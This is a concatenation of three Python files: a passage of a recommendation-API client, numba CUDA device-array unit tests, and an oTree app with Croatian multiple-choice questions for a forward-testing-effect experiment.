if create_if_missing is not None:
data['create_if_missing'] = create_if_missing
for items_chunk, items_m2m_chunk in self._chunk_items(items, items_m2m, chunk_size):
data['items'] = items_chunk
data['items_m2m'] = items_m2m_chunk
self.api.patch(path=path, data=data, timeout=60)
@require_login
def delete_item(self, item_id):
"""
Delete a single item; doesn't wait for task completion
:param bytes item_id:
"""
item_id_url = self._itemid2url(item_id)
self.api.delete(path=f'items/{item_id_url}/')
@require_login
def delete_items(self, items_id):
"""
Delete items; doesn't wait for task completion
:param ID-array items_id: items IDs
"""
data = {'items_id': self._itemid2body(items_id)}
self.api.delete(path='items-bulk/', data=data)
def _chunk_items(self, items, items_m2m, chunk_size):
items_m2m = items_m2m or []
# cast dict to list of dict
if isinstance(items_m2m, dict):
items_m2m = [{'name': name, 'array': array}
for name, array in items_m2m.items()]
n_chunks = int(numpy.ceil(len(items) / chunk_size))
for i in tqdm(range(n_chunks), disable=(True if n_chunks < 4 else None)):
start_idx = i * chunk_size
end_idx = (i + 1) * chunk_size
items_chunk = items[start_idx:end_idx]
# split M2M array-optimized if any
items_m2m_chunk = []
for m2m in items_m2m:
array = m2m['array']
if isinstance(array, numpy.ndarray):
mask = (array['item_index'] >= start_idx) & (array['item_index'] < end_idx)
array_chunk = array[mask] # does copy
array_chunk['item_index'] -= start_idx
else:
logging.warning('array-optimized many-to-many format is not efficient '
'with JSON. Use numpy arrays and pkl serializer instead')
array_chunk = [
{'item_index': row['item_index'] - start_idx, 'value_id': row['value_id']}
for row in array
if start_idx <= row['item_index'] < end_idx
]
items_m2m_chunk.append({'name': m2m['name'], 'array': array_chunk})
yield self._itemid2body(items_chunk), items_m2m_chunk
# === Reco: Item-to-item ===
@require_login
def get_reco_item_to_items(self, item_id, amt=None, cursor=None,
scenario=None, filters=None, reranking=None,
skip_default_scenario=None):
"""
Get similar items.
:param ID item_id: item ID
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: name of scenario
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
:param bool? skip_default_scenario: True to skip default scenario if any
:returns: {
'items_id': array of items IDs,
'next_cursor': str, pagination cursor to use in next request to get more items,
}
"""
item_id = self._itemid2url(item_id)
path = f'recommendation/items/{item_id}/items/'
params = {}
if amt:
params['amt'] = amt
if cursor:
params['cursor'] = cursor
if filters:
params['filters'] = filters
if reranking:
params['reranking'] = reranking
if scenario:
params['scenario'] = scenario
if skip_default_scenario is not None:
params['skip_default_scenario'] = skip_default_scenario
resp = self.api.get(path=path, params=params)
resp['items_id'] = self._body2itemid(resp['items_id'])
return resp
# === Reco: Session-to-item ===
@require_login
def get_reco_session_to_items(self, ratings=None, user_properties=None,
amt=None, cursor=None, scenario=None, filters=None,
reranking=None, exclude_rated_items=None,
skip_default_scenario=None):
"""
Get items recommendations given the ratings of an anonymous session.
:param array? ratings: ratings array with fields ['item_id': ID, 'rating': float]
:param dict? user_properties: user properties {**property_name: property_value(s)}
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: scenario name
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
:param bool? exclude_rated_items: exclude rated items from response
:param bool? skip_default_scenario: True to skip default scenario if any
:returns: {
'items_id': array of items IDs,
'next_cursor': str, pagination cursor to use in next request to get more items,
}
"""
path = f'recommendation/sessions/items/'
data = {}
if ratings is not None:
data['ratings'] = self._itemid2body(ratings)
if user_properties:
data['user_properties'] = user_properties
if amt:
data['amt'] = amt
if cursor:
data['cursor'] = cursor
if filters:
data['filters'] = filters
if reranking:
data['reranking'] = reranking
if exclude_rated_items is not None:
data['exclude_rated_items'] = exclude_rated_items
if scenario:
data['scenario'] = scenario
if skip_default_scenario is not None:
data['skip_default_scenario'] = skip_default_scenario
resp = self.api.post(path=path, data=data)
resp['items_id'] = self._body2itemid(resp['items_id'])
return resp
# === Reco: User-to-item ===
@require_login
def get_reco_user_to_items(self, user_id, amt=None, cursor=None, scenario=None,
filters=None, reranking=None,
exclude_rated_items=None, skip_default_scenario=None):
"""
Get items recommendations given a user ID.
:param ID user_id: user ID
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: scenario's name
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
:param bool? exclude_rated_items: exclude rated items from response
:param bool? skip_default_scenario: True to skip default scenario if any
:returns: {
'items_id': array of items IDs,
'next_cursor': str, pagination cursor to use in next request to get more items,
}
"""
user_id = self._userid2url(user_id)
path = f'recommendation/users/{user_id}/items/'
params = {}
if amt:
params['amt'] = amt
if cursor:
params['cursor'] = cursor
if filters:
params['filters'] = filters
if reranking:
params['reranking'] = reranking
if exclude_rated_items is not None:
params['exclude_rated_items'] = exclude_rated_items
if scenario:
params['scenario'] = scenario
if skip_default_scenario is not None:
params['skip_default_scenario'] = skip_default_scenario
resp = self.api.get(path=path, params=params)
resp['items_id'] = self._body2itemid(resp['items_id'])
return resp
# === Reco: User-to-item-property ===
@require_login
def get_reco_user_to_item_properties(self, user_id, property_name: str, amt=None):
"""
Recommends item-property values given a user ID
:param bytes user_id:
:param str property_name:
:param int? amt: (default 16) maximal number of property values to return for each property
:raises: NotFoundError when data not found
:raises: RequestError if property missing
:return: {'properties': [n,] np.array, n<=amt}
"""
user_id = self._userid2url(user_id)
path = f'recommendation/users/{user_id}/items-properties/{property_name}/'
params = {}
if amt:
params['amt'] = amt
resp = self.api.get(path=path, params=params)
return resp
# === Reco: Session-to-item with Context Items ===
@require_login
def get_reco_session_to_items_w_ctx_items(
self, context_items, ratings=None, user_properties=None, amt=None, cursor=None,
scenario=None, filters=None, reranking=None, exclude_rated_items=None,
skip_default_scenario=None):
"""
Get items recommendations given the ratings of an anonymous session and context items ID.
:param array context_items: context items ID array with fields ['item_id': ID]
:param array? ratings: ratings array with fields ['item_id': ID, 'rating': float]
:param dict? user_properties: user properties {**property_name: property_value(s)}
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: scenario name
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: Item-property reranking. Format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_WEIGHT>:<OPTIONS>']
:param bool? exclude_rated_items: exclude rated items from response
:param bool? skip_default_scenario: True to skip default scenario if any
:returns: {
'items_id': array of items IDs,
'next_cursor': str, pagination cursor to use in next request to get more items,
}
"""
path = f'recommendation/context-items/sessions/items/'
data = {
'context_items': context_items,
}
if ratings is not None:
data['ratings'] = self._itemid2body(ratings)
if user_properties:
data['user_properties'] = user_properties
if amt:
data['amt'] = amt
if cursor:
data['cursor'] = cursor
if filters:
data['filters'] = filters
if reranking:
data['reranking'] = reranking
if exclude_rated_items is not None:
data['exclude_rated_items'] = exclude_rated_items
if scenario:
data['scenario'] = scenario
if skip_default_scenario is not None:
data['skip_default_scenario'] = skip_default_scenario
resp = self.api.post(path=path, data=data)
resp['items_id'] = self._body2itemid(resp['items_id'])
return resp
# === Reco: User-to-item with Context Items ===
@require_login
def get_reco_user_to_items_w_ctx_items(
self, context_items, user_id, amt=None, cursor=None, scenario=None, filters=None,
reranking=None, exclude_rated_items=None, skip_default_scenario=None):
"""
Get items recommendations given a user ID and context items ID.
:param array context_items: context items ID array with fields ['item_id': ID]
:param ID user_id: user ID
:param int? amt: amount to return (default: use the API default)
:param str? cursor: Pagination cursor
:param str? scenario: scenario's name
:param list-str? filters: Item-property filters. Filter format: ['<PROP_NAME>:<OPERATOR>:<OPTIONAL_VALUE>',...]
:param list-str? reranking: | |
<reponame>ludaavics/numba
import numpy as np
from numba.cuda.cudadrv import devicearray
from numba import cuda
from numba.cuda.testing import unittest, CUDATestCase
from numba.cuda.testing import skip_on_cudasim
class TestCudaNDArray(CUDATestCase):
def test_device_array_interface(self):
dary = cuda.device_array(shape=100)
devicearray.verify_cuda_ndarray_interface(dary)
ary = np.empty(100)
dary = cuda.to_device(ary)
devicearray.verify_cuda_ndarray_interface(dary)
ary = np.asarray(1.234)
dary = cuda.to_device(ary)
self.assertEquals(dary.ndim, 1)
devicearray.verify_cuda_ndarray_interface(dary)
def test_device_array_from_readonly(self):
ary = np.arange(100, dtype=np.float32)
# Make the array readonly
ary.flags.writeable = False
self.assertFalse(ary.flags.writeable)
# Ensure that we can copy the readonly array
dary = cuda.to_device(ary)
retr = dary.copy_to_host()
np.testing.assert_array_equal(retr, ary)
def test_devicearray_dtype(self):
dary = cuda.device_array(shape=(100,), dtype="f4")
self.assertEqual(dary.dtype, np.dtype("f4"))
def test_devicearray_no_copy(self):
array = np.arange(100, dtype=np.float32)
cuda.to_device(array, copy=False)
def test_devicearray_shape(self):
ary = np.arange(2 * 3 * 4).reshape(2, 3, 4)
dary = cuda.to_device(ary)
self.assertEquals(ary.shape, dary.shape)
self.assertEquals(ary.shape[1:], dary.shape[1:])
def test_devicearray(self):
array = np.arange(100, dtype=np.int32)
original = array.copy()
gpumem = cuda.to_device(array)
array[:] = 0
gpumem.copy_to_host(array)
np.testing.assert_array_equal(array, original)
def test_stream_bind(self):
stream = cuda.stream()
with stream.auto_synchronize():
arr = cuda.device_array(
(3, 3),
dtype=np.float64,
stream=stream)
self.assertEqual(arr.bind(stream).stream, stream)
self.assertEqual(arr.stream, stream)
def test_len_1d(self):
ary = np.empty((3,))
dary = cuda.device_array(3)
self.assertEqual(len(ary), len(dary))
def test_len_2d(self):
ary = np.empty((3, 5))
dary = cuda.device_array((3, 5))
self.assertEqual(len(ary), len(dary))
def test_len_3d(self):
ary = np.empty((3, 5, 7))
dary = cuda.device_array((3, 5, 7))
self.assertEqual(len(ary), len(dary))
def test_devicearray_partition(self):
N = 100
array = np.arange(N, dtype=np.int32)
original = array.copy()
gpumem = cuda.to_device(array)
left, right = gpumem.split(N // 2)
array[:] = 0
self.assertTrue(np.all(array == 0))
right.copy_to_host(array[N//2:])
left.copy_to_host(array[:N//2])
self.assertTrue(np.all(array == original))
def test_devicearray_replace(self):
N = 100
array = np.arange(N, dtype=np.int32)
original = array.copy()
gpumem = cuda.to_device(array)
cuda.to_device(array * 2, to=gpumem)
gpumem.copy_to_host(array)
np.testing.assert_array_equal(array, original * 2)
@skip_on_cudasim('This works in the simulator')
def test_devicearray_transpose_wrongdim(self):
gpumem = cuda.to_device(np.array(np.arange(12)).reshape(3, 4, 1))
with self.assertRaises(NotImplementedError) as e:
np.transpose(gpumem)
self.assertEqual(
"transposing a non-2D DeviceNDArray isn't supported",
str(e.exception))
def test_devicearray_transpose_identity(self):
# any-shape identities should work
original = np.array(np.arange(24)).reshape(3, 4, 2)
array = np.transpose(cuda.to_device(original), axes=(0, 1, 2)).copy_to_host()
self.assertTrue(np.all(array == original))
def test_devicearray_transpose_duplicatedaxis(self):
gpumem = cuda.to_device(np.array(np.arange(12)).reshape(3, 4))
with self.assertRaises(ValueError) as e:
np.transpose(gpumem, axes=(0, 0))
self.assertIn(
str(e.exception),
container=[
'invalid axes list (0, 0)', # GPU
'repeated axis in transpose', # sim
])
def test_devicearray_transpose_wrongaxis(self):
gpumem = cuda.to_device(np.array(np.arange(12)).reshape(3, 4))
with self.assertRaises(ValueError) as e:
np.transpose(gpumem, axes=(0, 2))
self.assertIn(
str(e.exception),
container=[
'invalid axes list (0, 2)', # GPU
'invalid axis for this array',
'axis 2 is out of bounds for array of dimension 2', # sim
])
def test_devicearray_view_ok(self):
original = np.array(np.arange(12), dtype="i2").reshape(3, 4)
array = cuda.to_device(original)
for dtype in ("i4", "u4", "i8", "f8"):
with self.subTest(dtype=dtype):
np.testing.assert_array_equal(
array.view(dtype).copy_to_host(),
original.view(dtype)
)
def test_devicearray_view_ok_not_c_contig(self):
original = np.array(np.arange(32), dtype="i2").reshape(4, 8)
array = cuda.to_device(original)[:, ::2]
original = original[:, ::2]
np.testing.assert_array_equal(
array.view("u2").copy_to_host(),
original.view("u2")
)
def test_devicearray_view_bad_not_c_contig(self):
original = np.array(np.arange(32), dtype="i2").reshape(4, 8)
array = cuda.to_device(original)[:, ::2]
with self.assertRaises(ValueError) as e:
array.view("i4")
self.assertEqual(
"To change to a dtype of a different size,"
" the array must be C-contiguous",
str(e.exception))
def test_devicearray_view_bad_itemsize(self):
original = np.array(np.arange(12), dtype="i2").reshape(4, 3)
array = cuda.to_device(original)
with self.assertRaises(ValueError) as e:
array.view("i4")
self.assertEqual(
"When changing to a larger dtype,"
" its size must be a divisor of the total size in bytes"
" of the last axis of the array.",
str(e.exception))
def test_devicearray_transpose_ok(self):
original = np.array(np.arange(12)).reshape(3, 4)
array = np.transpose(cuda.to_device(original)).copy_to_host()
self.assertTrue(np.all(array == original.T))
def test_devicearray_transpose_T(self):
original = np.array(np.arange(12)).reshape(3, 4)
array = cuda.to_device(original).T.copy_to_host()
self.assertTrue(np.all(array == original.T))
def test_devicearray_contiguous_slice(self):
# memcpys are dumb ranges of bytes, so trying to
# copy to a non-contiguous range shouldn't work!
a = np.arange(25).reshape(5, 5, order='F')
s = np.full(fill_value=5, shape=(5,))
d = cuda.to_device(a)
a[2] = s
# d is in F-order (not C-order), so d[2] is not contiguous
# (40-byte strides). This means we can't memcpy to it!
with self.assertRaises(ValueError) as e:
d[2].copy_to_device(s)
self.assertEqual(
devicearray.errmsg_contiguous_buffer,
str(e.exception))
# if d[2].copy_to_device(s), then this would pass:
# self.assertTrue((a == d.copy_to_host()).all())
def _test_devicearray_contiguous_host_copy(self, a_c, a_f):
"""
Checks host->device memcpys
"""
self.assertTrue(a_c.flags.c_contiguous)
self.assertTrue(a_f.flags.f_contiguous)
for original, copy in [
(a_f, a_f),
(a_f, a_c),
(a_c, a_f),
(a_c, a_c),
]:
msg = '%s => %s' % (
'C' if original.flags.c_contiguous else 'F',
'C' if copy.flags.c_contiguous else 'F',
)
d = cuda.to_device(original)
d.copy_to_device(copy)
self.assertTrue(np.all(d.copy_to_host() == a_c), msg=msg)
self.assertTrue(np.all(d.copy_to_host() == a_f), msg=msg)
def test_devicearray_contiguous_copy_host_3d(self):
a_c = np.arange(5 * 5 * 5).reshape(5, 5, 5)
a_f = np.array(a_c, order='F')
self._test_devicearray_contiguous_host_copy(a_c, a_f)
def test_devicearray_contiguous_copy_host_1d(self):
a_c = np.arange(5)
a_f = np.array(a_c, order='F')
self._test_devicearray_contiguous_host_copy(a_c, a_f)
def test_devicearray_contiguous_copy_device(self):
a_c = np.arange(5 * 5 * 5).reshape(5, 5, 5)
a_f = np.array(a_c, order='F')
self.assertTrue(a_c.flags.c_contiguous)
self.assertTrue(a_f.flags.f_contiguous)
d = cuda.to_device(a_c)
with self.assertRaises(ValueError) as e:
d.copy_to_device(cuda.to_device(a_f))
self.assertEqual(
"incompatible strides: {} vs. {}".format(a_c.strides, a_f.strides),
str(e.exception))
d.copy_to_device(cuda.to_device(a_c))
self.assertTrue(np.all(d.copy_to_host() == a_c))
d = cuda.to_device(a_f)
with self.assertRaises(ValueError) as e:
d.copy_to_device(cuda.to_device(a_c))
self.assertEqual(
"incompatible strides: {} vs. {}".format(a_f.strides, a_c.strides),
str(e.exception))
d.copy_to_device(cuda.to_device(a_f))
self.assertTrue(np.all(d.copy_to_host() == a_f))
def test_devicearray_broadcast_host_copy(self):
try:
broadcast_to = np.broadcast_to
except AttributeError:
# numpy<1.10 doesn't have broadcast_to. The following implements
# a limited broadcast_to that only works along already existing
# dimensions of length 1.
def broadcast_to(arr, new_shape):
new_strides = []
for new_length, length, stride in zip(
new_shape, arr.shape, arr.strides
):
if length == 1 and new_length > 1:
new_strides.append(0)
elif new_length == length:
new_strides.append(stride)
else:
raise ValueError(
"cannot broadcast shape {} to shape {}"
.format(arr.shape, new_shape)
)
return np.ndarray(
buffer=np.squeeze(arr),
dtype=arr.dtype,
shape=new_shape,
strides=tuple(new_strides),
)
broadsize = 4
coreshape = (2, 3)
coresize = np.prod(coreshape)
core_c = np.arange(coresize).reshape(coreshape, order='C')
core_f = np.arange(coresize).reshape(coreshape, order='F')
for dim in range(len(coreshape)):
newindex = (slice(None),) * dim + (np.newaxis,)
broadshape = coreshape[:dim] + (broadsize,) + coreshape[dim:]
broad_c = broadcast_to(core_c[newindex], broadshape)
broad_f = broadcast_to(core_f[newindex], broadshape)
dbroad_c = cuda.to_device(broad_c)
dbroad_f = cuda.to_device(broad_f)
np.testing.assert_array_equal(dbroad_c.copy_to_host(), broad_c)
np.testing.assert_array_equal(dbroad_f.copy_to_host(), broad_f)
# Also test copying across different core orderings
dbroad_c.copy_to_device(broad_f)
dbroad_f.copy_to_device(broad_c)
np.testing.assert_array_equal(dbroad_c.copy_to_host(), broad_f)
np.testing.assert_array_equal(dbroad_f.copy_to_host(), broad_c)
def test_devicearray_contiguous_host_strided(self):
a_c = np.arange(10)
d = cuda.to_device(a_c)
arr = np.arange(20)[::2]
d.copy_to_device(arr)
np.testing.assert_array_equal(d.copy_to_host(), arr)
def test_devicearray_contiguous_device_strided(self):
d = cuda.to_device(np.arange(20))
arr = np.arange(20)
with self.assertRaises(ValueError) as e:
d.copy_to_device(cuda.to_device(arr)[::2])
self.assertEqual(
devicearray.errmsg_contiguous_buffer,
str(e.exception))
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_simple_c(self):
# C-order 1D array
a = np.zeros(10, order='C')
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_simple_f(self):
# F-order array that is also C layout.
a = np.zeros(10, order='F')
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_2d_c(self):
# C-order 2D array
a = np.zeros((2, 10), order='C')
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_2d_f(self):
# F-order array that can only be F layout
a = np.zeros((2, 10), order='F')
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'F')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_noncontig_slice_c(self):
# Non-contiguous slice of C-order array
a = np.zeros((5, 5), order='C')
d = cuda.to_device(a)[:,2]
self.assertEqual(d._numba_type_.layout, 'A')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_noncontig_slice_f(self):
# Non-contiguous slice of F-order array
a = np.zeros((5, 5), order='F')
d = cuda.to_device(a)[2,:]
self.assertEqual(d._numba_type_.layout, 'A')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_contig_slice_c(self):
# Contiguous slice of C-order array
a = np.zeros((5, 5), order='C')
d = cuda.to_device(a)[2,:]
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_contig_slice_f(self):
# Contiguous slice of F-order array - is both C- and F-contiguous, so
# types as 'C' layout
a = np.zeros((5, 5), order='F')
d = cuda.to_device(a)[:,2]
self.assertEqual(d._numba_type_.layout, 'C')
@skip_on_cudasim('Typing not done in the simulator')
def test_devicearray_typing_order_broadcasted(self):
# Broadcasted array, similar to that used for passing scalars to ufuncs
a = np.broadcast_to(np.array([1]), (10,))
d = cuda.to_device(a)
self.assertEqual(d._numba_type_.layout, 'A')
class TestRecarray(CUDATestCase):
def test_recarray(self):
# From issue #4111
a = np.recarray((16,), dtype=[
("value1", np.int64),
("value2", np.float64),
])
a.value1 = np.arange(a.size, dtype=np.int64)
a.value2 = np.arange(a.size, dtype=np.float64) / 100
expect1 = a.value1
expect2 = a.value2
def test(x, out1, out2):
i = cuda.grid(1)
if i < x.size:
out1[i] = x.value1[i]
out2[i] = x.value2[i]
got1 = np.zeros_like(expect1)
got2 = np.zeros_like(expect2)
cuda.jit(test)[1, a.size](a, got1, got2)
np.testing.assert_array_equal(expect1, got1)
np.testing.assert_array_equal(expect2, got2)
class TestCoreContiguous(CUDATestCase):
def _test_against_array_core(self, view):
self.assertEqual(
devicearray.is_contiguous(view),
devicearray.array_core(view).flags['C_CONTIGUOUS']
)
def test_device_array_like_1d(self):
d_a = cuda.device_array(10, order='C')
self._test_against_array_core(d_a)
def test_device_array_like_2d(self):
d_a = cuda.device_array((10, 12), order='C')
self._test_against_array_core(d_a)
def test_device_array_like_2d_transpose(self):
d_a = cuda.device_array((10, 12), order='C')
self._test_against_array_core(d_a.T)
def test_device_array_like_3d(self):
d_a = cuda.device_array((10, 12, 14), order='C')
self._test_against_array_core(d_a)
def test_device_array_like_1d_f(self):
d_a = cuda.device_array(10, order='F')
self._test_against_array_core(d_a)
def test_device_array_like_2d_f(self):
d_a = cuda.device_array((10, 12), order='F')
self._test_against_array_core(d_a)
def test_device_array_like_2d_f_transpose(self):
d_a = cuda.device_array((10, 12), order='F')
self._test_against_array_core(d_a.T)
def test_device_array_like_3d_f(self):
d_a = cuda.device_array((10, 12, 14), order='F')
self._test_against_array_core(d_a)
def test_1d_view(self):
shape = 10
view = np.zeros(shape)[::2]
self._test_against_array_core(view)
def test_1d_view_f(self):
shape = 10
view = np.zeros(shape, order='F')[::2]
self._test_against_array_core(view)
def test_2d_view(self):
shape = | |
<filename>scripts/exp-application/fwt_oTree/fwt/models.py
from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer
)
author = '<NAME>'
doc = """
This app is designed to investigate the forward testing effect
"""
class Constants(BaseConstants):
name_in_url = 'fwt'
players_per_group = None
num_rounds = 1
class Subsession(BaseSubsession):
pass
class Group(BaseGroup):
pass
# Pitanja dodajemo tako da unesemo "label" kao prvi argument models.IntegerField-u!
class Player(BasePlayer):
identity = models.StringField(label = 'prva dva slova imena oca, zadnja dva slova imena majke, i zadnja dva broja mobitela:')
def feedback(self, form_fields):
if form_fields == 2:
print('Točno')
else:
print('Netočno')
# practice questions
practice_q1 = models.IntegerField(label = 'Tlak kisika uvijek iznosi manje od:',
choices = [
[1, '10% ukupnog atmosferskog tlaka'],
[2, '21% ukupnog atmosferskog tlaka'],
[3, '73% ukupnog atmosferskog tlaka'],
[4, '87% ukupnog atmosferskog tlaka']],
widget = widgets.RadioSelect)
practice_q2 = models.IntegerField(label = """Ovisno o promjeni nadmorske visine,
odnos veličine parcijalnog tlaka kisika u atmosferi i veličine parcijalnog tlaka
kisika u alveolama pluća je:""",
choices = [
[1, 'proporcionalan'],
[2, 'eksponencijalan'],
[3, 'konstantan'],
[4, 'neproporcionalan']],
widget = widgets.RadioSelect)
practice_q3 = models.IntegerField(label = """Smanjenje parcijalnog tlaka kisika
u zraku može biti posljedica:""",
choices = [
[1, 'povećanja proporcije vodene pare'],
[2, 'povećanja nadmorske visine'],
[3, 'pojačane respiracijske aktivnosti'],
[4, 'smanjenja proporcije vodene pare']],
widget = widgets.RadioSelect)
practice_q4 = models.IntegerField(label = """S porastom nadmorske visine, izmjena
ugljikovog dioksida između alveola i plućnih kapilara je:""",
choices = [
[1, 'povećana'],
[2, 'smanjena'],
[3, 'konstantna'],
[4, 'razmjerna količini vodene pare u alveolama']],
widget = widgets.RadioSelect)
# test1 content questions
test1_q1 = models.IntegerField(label = 'Koliko se drvenastih i zeljastih biljaka smatra korovima (zaokružite najbližu vrijednost)?',
choices = [
[1, 'više od 2500'],
[2, 'više od 3000'],
[3, 'više od 3500'],
[4, 'više od 4000']],
widget = widgets.RadioSelect)
test1_q2 = models.IntegerField(label = 'Na urbanim prostorima se pojavljuju korovima srodne:',
choices = [
[1, 'rudimentarne biljke'],
[2, 'runalne biljke'],
[3, 'repaste biljke'],
[4, 'ruderalne biljke']],
widget = widgets.RadioSelect)
test1_q3 = models.IntegerField(label = 'Za korove je karakteristično da imaju:',
choices = [
[1, 'učinkovit korijenski, ali ne i nadzemni sustav'],
[2, 'učinkovit nadzemni sustav, ali ne i korijenski'],
[3, 'učinkovit korijenski i nadzemni sustav'],
[4, 'neučinkovit i korijenski i nadzemni sustav']],
widget = widgets.RadioSelect)
test1_q4 = models.IntegerField(label = 'Hoće li se biljka nazvati korovom ili ne, ovisi o:',
choices = [
[1, 'stupnju u kojem crpi resurse od kulturne biljke'],
[2, 'njenoj rasprostranjenosti na nekom području'],
[3, 'tome je li biljka cilj uzgoja'],
[4, 'njenom potencijalu za proliferaciju']],
widget = widgets.RadioSelect)
test1_q5 = models.IntegerField(label = 'Korovi uglavnom pripadaju u skupinu:',
choices = [
[1, 'autotrofnih biljaka'],
[2, 'semitrofnih biljaka'],
[3, 'heterotrofnih biljaka'],
[4, 'autosomnih biljaka']],
widget = widgets.RadioSelect)
test1_q6 = models.IntegerField(label = 'Dio okoliša koji su ljudi prilagodili za poljoprivrednu proizvodnju naziva se:',
choices = [
[1, 'agrocenoza'],
[2, 'agrodom'],
[3, 'agrosfera'],
[4, 'agrotop']],
widget = widgets.RadioSelect)
test1_q7 = models.IntegerField(label = 'Talofite su:',
choices = [
[1, 'parazitske biljke'],
[2, 'gljive'],
[3, 'alge'],
[4, 'drvenaste biljke']],
widget = widgets.RadioSelect)
test1_q8 = models.IntegerField(label = 'Korovi mogu biti korisni u:',
choices = [
[1, 'proizvodnji umjetnih gnojiva'],
[2, 'proizvo dnji celuloznih vlakana'],
[3, 'proizvodnji antihistaminika'],
[4, 'proizvodnji prirodnih boja']],
widget = widgets.RadioSelect)
test1_q9 = models.IntegerField(label = 'Agrofitocenoze su:',
choices = [
[1, 'biljne zajednice korova i kulturnih biljaka'],
[2, 'zajednice kulturnih biljaka i sisavaca koji nastanjuju poljoprivredne površine'],
[3, 'zajednice raznovrsnih kulturnih biljaka'],
[4, 'zajednice raznovrsnih korova na poljoprivrednim površinama']],
widget = widgets.RadioSelect)
test1_q10 = models.IntegerField(label = 'Koja od navedenih biljaka je istovremeno i korov i kulturna biljka?',
choices = [
[1, '<NAME>'],
[2, '<NAME>'],
[3, 'cikorija'],
[4, 'ječam']],
widget = widgets.RadioSelect)
# test2 content questions
test2_q1 = models.IntegerField(label = 'Dio okoliša koji su ljudi naselili i prilagodili sebi naziva se:',
choices = [
[1, 'antropofitocenoza'],
[2, 'antroposfera'],
[3, 'agrosfera'],
[4, 'antrotop']],
widget = widgets.RadioSelect)
test2_q2 = models.IntegerField(label = 'Podzemni dio stabiljke zove se:',
choices = [
[1, 'rudela'],
[2, 'gomolj'],
[3, 'korijen'],
[4, 'rizom']],
widget = widgets.RadioSelect)
test2_q3 = models.IntegerField(label = 'U odnosu na mlađe korovske biljke, starije korovske biljke:',
choices = [
[1, 'imaju jači alelopatijski učinak'],
[2, 'sadrže više fitotoksina'],
[3, 'sadrže manje inhibitornih tvari'],
[4, 'pokazuju veću plastičnost']],
widget = widgets.RadioSelect)
test2_q4 = models.IntegerField(label = 'Suncokret nepovoljno djeluje na rast:',
choices = [
[1, 'ambrozije'],
[2, 'cikorije'],
[3, 'koštana'],
[4, 'pirike']],
widget = widgets.RadioSelect)
test2_q5 = models.IntegerField(label = 'Pojava korova vezana je uz stvaranje:',
choices = [
[1, 'agrosfere i agrofitocenoze'],
[2, 'antroposfere i astenosfere'],
[3, 'ekosfere i fitocenoze'],
[4, 'antroposfere i agrosfere']],
widget = widgets.RadioSelect)
test2_q6 = models.IntegerField(label = 'Na poljoprivrednim zemljištima, biljni sastav korova mijenja se:',
choices = [
[1, 'ovisno o sustavu godišnje izmjene usjeva i obradi tla'],
[2, 'ovisno o obradi tla i kolebanju ekoloških čimbenika'],
[3, 'ovisno o njegovom potencijalu za proliferaciju'],
[4, 'neovisno o poljoprivrednim zahvatima']],
widget = widgets.RadioSelect)
test2_q7 = models.IntegerField(label = 'Utjecaj koji jedna vrsta ima na rast i razvitak druge vrste naziva se:',
choices = [
[1, 'anuliranje'],
[2, 'alelopatija'],
[3, 'fitopatija'],
[4, 'anualnost']],
widget = widgets.RadioSelect)
test2_q8 = models.IntegerField(label = 'Korovi su se na poljoprivrednim površinama pojavili',
choices = [
[1, 'u mlađe kameno doba, pri stvaranju prvih agrofitocenoza'],
[2, 'u starije kameno doba, pri stvaranju antroposfere'],
[3, 'u mlađe kameno doba, pri stvaranju agrosfere'],
[4, 'u starije kameno doba, pri stvaranju prvih fitocenoza']],
widget = widgets.RadioSelect)
test2_q9 = models.IntegerField(label = 'Plodored se odnosi na:',
choices = [
[1, 'sustav godišnje izmjene usjeva'],
[2, 'način gnojenja kultura u svrhu restrikcije rasta i razvoja korova'],
[3, 'uzgoj biljaka pri kojem je karakteristično okopavanje'],
[4, 'broj jedinki zasađenih u jednom redu']],
widget = widgets.RadioSelect)
test2_q10 = models.IntegerField(label = 'Koji korov može pozitivno djelovati na raž?',
choices = [
[1, 'troskot'],
[2, 'trputac'],
[3, 'poljska ljubica'],
[4, 'slakoperka']],
widget = widgets.RadioSelect)
# test3 content questions
test3_q1 = models.IntegerField(label = 'Veća otpornost prema nepovoljnim biotskim čimbenicima odnosi se prvenstveno na otpornost prema:',
choices = [
[1, 'inhibitornim tvarima'],
[2, 'parazitskim biljkama'],
[3, 'virusima i bakterijama'],
[4, 'bolestima i štetnicima']],
widget = widgets.RadioSelect)
